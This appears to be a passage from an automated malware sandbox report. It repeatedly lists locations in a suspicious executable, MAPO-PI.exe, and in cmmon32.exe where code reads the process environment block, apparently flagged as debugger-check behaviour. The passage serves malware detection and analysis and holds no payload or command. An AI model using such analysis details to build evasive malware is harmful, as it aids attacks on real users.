          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h]3_2_0194B260
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968A62 mov eax, dword ptr fs:[00000030h]3_2_01968A62
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D927A mov eax, dword ptr fs:[00000030h]3_2_018D927A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]3_2_01892D8A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]3_2_01892D8A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]3_2_01892D8A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]3_2_01892D8A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]3_2_01892D8A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]3_2_018C2581
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]3_2_018C2581
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]3_2_018C2581
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]3_2_018C2581
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h]3_2_018CFD9B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h]3_2_018CFD9B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h]3_2_01952D82
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C35A1 mov eax, dword ptr fs:[00000030h]3_2_018C35A1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]3_2_018C1DB5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]3_2_018C1DB5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]3_2_018C1DB5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019605AC mov eax, dword ptr fs:[00000030h]3_2_019605AC
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019605AC mov eax, dword ptr fs:[00000030h]3_2_019605AC
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]3_2_01916DC9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]3_2_01916DC9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]3_2_01916DC9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov ecx, dword ptr fs:[00000030h]3_2_01916DC9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]3_2_01916DC9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]3_2_01916DC9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01948DF1 mov eax, dword ptr fs:[00000030h]3_2_01948DF1
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h]3_2_018AD5E0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h]3_2_018AD5E0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]3_2_0195FDE2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]3_2_0195FDE2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]3_2_0195FDE2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]3_2_0195FDE2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968D34 mov eax, dword ptr fs:[00000030h]3_2_01968D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0191A537 mov eax, dword ptr fs:[00000030h]3_2_0191A537
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195E539 mov eax, dword ptr fs:[00000030h]3_2_0195E539
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]3_2_018C4D3B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]3_2_018C4D3B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]3_2_018C4D3B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189AD30 mov eax, dword ptr fs:[00000030h]3_2_0189AD30
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]3_2_018A3D34
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D3D43 mov eax, dword ptr fs:[00000030h]3_2_018D3D43
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01913540 mov eax, dword ptr fs:[00000030h]3_2_01913540
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01943D40 mov eax, dword ptr fs:[00000030h]3_2_01943D40
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B7D50 mov eax, dword ptr fs:[00000030h]3_2_018B7D50
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h]3_2_018BC577
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h]3_2_018BC577
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]3_2_01954496
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A849B mov eax, dword ptr fs:[00000030h]3_2_018A849B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968CD6 mov eax, dword ptr fs:[00000030h]3_2_01968CD6
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]3_2_01916CF0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]3_2_01916CF0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]3_2_01916CF0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019514FB mov eax, dword ptr fs:[00000030h]3_2_019514FB
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]3_2_01951C06
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]3_2_0196740D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]3_2_0196740D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]3_2_0196740D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]3_2_01916C0A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]3_2_01916C0A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]3_2_01916C0A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]3_2_01916C0A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CBC2C mov eax, dword ptr fs:[00000030h]3_2_018CBC2C
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h]3_2_0192C450
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h]3_2_0192C450
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA44B mov eax, dword ptr fs:[00000030h]3_2_018CA44B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B746D mov eax, dword ptr fs:[00000030h]3_2_018B746D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]3_2_018CAC7B
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]3_2_01917794
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]3_2_01917794
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]3_2_01917794
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A8794 mov eax, dword ptr fs:[00000030h]3_2_018A8794
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D37F5 mov eax, dword ptr fs:[00000030h]3_2_018D37F5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h]3_2_0192FF10
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h]3_2_0192FF10
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h]3_2_018CA70E
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h]3_2_018CA70E
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196070D mov eax, dword ptr fs:[00000030h]3_2_0196070D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196070D mov eax, dword ptr fs:[00000030h]3_2_0196070D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BF716 mov eax, dword ptr fs:[00000030h]3_2_018BF716
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h]3_2_01894F2E
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h]3_2_01894F2E
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB73D mov eax, dword ptr fs:[00000030h]3_2_018BB73D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB73D mov eax, dword ptr fs:[00000030h]3_2_018BB73D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CE730 mov eax, dword ptr fs:[00000030h]3_2_018CE730
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AEF40 mov eax, dword ptr fs:[00000030h]3_2_018AEF40
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AFF60 mov eax, dword ptr fs:[00000030h]3_2_018AFF60
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968F6A mov eax, dword ptr fs:[00000030h]3_2_01968F6A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192FE87 mov eax, dword ptr fs:[00000030h]3_2_0192FE87
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]3_2_01960EA5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]3_2_01960EA5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]3_2_01960EA5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019146A7 mov eax, dword ptr fs:[00000030h]3_2_019146A7
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968ED6 mov eax, dword ptr fs:[00000030h]3_2_01968ED6
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C36CC mov eax, dword ptr fs:[00000030h]3_2_018C36CC
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D8EC7 mov eax, dword ptr fs:[00000030h]3_2_018D8EC7
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194FEC0 mov eax, dword ptr fs:[00000030h]3_2_0194FEC0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A76E2 mov eax, dword ptr fs:[00000030h]3_2_018A76E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C16E0 mov ecx, dword ptr fs:[00000030h]3_2_018C16E0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]3_2_0189C600
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]3_2_0189C600
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]3_2_0189C600
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C8E00 mov eax, dword ptr fs:[00000030h]3_2_018C8E00
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h]3_2_018CA61C
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h]3_2_018CA61C
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951608 mov eax, dword ptr fs:[00000030h]3_2_01951608
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189E620 mov eax, dword ptr fs:[00000030h]3_2_0189E620
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194FE3F mov eax, dword ptr fs:[00000030h]3_2_0194FE3F
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]3_2_018A7E41
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]3_2_018A7E41
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]3_2_018A7E41
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]3_2_018A7E41
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]3_2_018A7E41
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]3_2_018A7E41
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h]3_2_0195AE44
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h]3_2_0195AE44
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A766D mov eax, dword ptr fs:[00000030h]3_2_018A766D
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]3_2_018BAE73
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]3_2_018BAE73
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]3_2_018BAE73
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]3_2_018BAE73
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]3_2_018BAE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D38CD6 mov eax, dword ptr fs:[00000030h]16_2_04D38CD6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D214FB mov eax, dword ptr fs:[00000030h]16_2_04D214FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h]16_2_04CE6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h]16_2_04CE6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h]16_2_04CE6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7849B mov eax, dword ptr fs:[00000030h]16_2_04C7849B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9A44B mov eax, dword ptr fs:[00000030h]16_2_04C9A44B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CFC450 mov eax, dword ptr fs:[00000030h]16_2_04CFC450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CFC450 mov eax, dword ptr fs:[00000030h]16_2_04CFC450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8746D mov eax, dword ptr fs:[00000030h]16_2_04C8746D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h]16_2_04CE6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h]16_2_04CE6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h]16_2_04CE6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h]16_2_04CE6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]16_2_04D21C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h]16_2_04D3740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h]16_2_04D3740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h]16_2_04D3740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9BC2C mov eax, dword ptr fs:[00000030h]16_2_04C9BC2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h]16_2_04CE6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h]16_2_04CE6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h]16_2_04CE6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6DC9 mov ecx, dword ptr fs:[00000030h]16_2_04CE6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h]16_2_04CE6DC9
